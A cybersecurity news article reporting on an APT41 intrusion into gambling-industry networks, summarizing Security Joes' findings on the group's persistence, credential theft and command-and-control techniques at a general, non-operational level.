The notorious Chinese nation-state hacking group, APT41—also referred to as Brass Typhoon, Earth Baku, Wicked Panda, or Winnti—has been linked to a well-planned cyberattack on the gambling and gaming industries. Over a span of six months, the attackers quietly gathered sensitive information, including network configurations, user passwords, and data extracted from the LSASS process, according to Ido Naor, CEO of Israeli cybersecurity firm Security Joes.
Throughout the breach, the attackers consistently upgraded their tools, adjusting them in response to the security team’s efforts. This continuous adaptation allowed them to stay under the radar and maintain control of the compromised network for nearly nine months. This attack shows parallels with a previous campaign, known as Operation Crimson Palace, which has been tracked by cybersecurity firm Sophos.
While many state-sponsored cyberattacks have political or espionage motives, Security Joes believes this attack was driven by financial interests. Naor revealed that the campaign appears to have been designed for monetary gain, with APT41 using stealth tactics and customized tools to evade detection and establish persistent remote access. Once inside the network, they reportedly executed a DCSync attack to collect service and admin password hashes, extending their control over critical accounts.
Although the exact method of initial entry remains unclear, spear-phishing is suspected, given the lack of active vulnerabilities in public-facing web applications. Once the network was breached, APT41 relied on techniques like Phantom DLL Hijacking and the legitimate wmic.exe
utility to achieve their goals. They exploited administrator privileges from service accounts to execute additional malicious code, further entrenching themselves within the infrastructure.
A notable second stage of the attack involved delivering a malicious DLL file—TSVIPSrv.dll—through the SMB protocol, which then communicated with a hard-coded command-and-control (C2) server. If the initial C2 server failed, the malware cleverly updated itself by scraping GitHub to find new C2 server details, extracting capitalized letters from HTML results to generate the IP address.
Security Joes reports that after their activities were detected, the attackers went silent for weeks, only to return later with more obfuscated and advanced techniques. Their use of the LOLBIN utility wmic.exe
to execute malicious JavaScript code further highlights their adaptability. The attack was particularly targeted, focusing on machines with IP addresses containing ‘10.20.22,’ which narrowed their reach to specific VPN subnet devices.
This operation showcases APT41’s ability to blend espionage with financially motivated intrusions, reflecting the growing sophistication of state-sponsored cybercriminals who can quickly adjust to changing defenses while leaving a devastating impact on their targets.
Conclusion
APT41’s relentless and adaptive methods in infiltrating the gambling sector underscore the severe threat posed by nation-state actors with financial motives. Their use of evolving tactics and targeting of specific infrastructure highlights the urgent need for stronger defenses against these sophisticated attacks.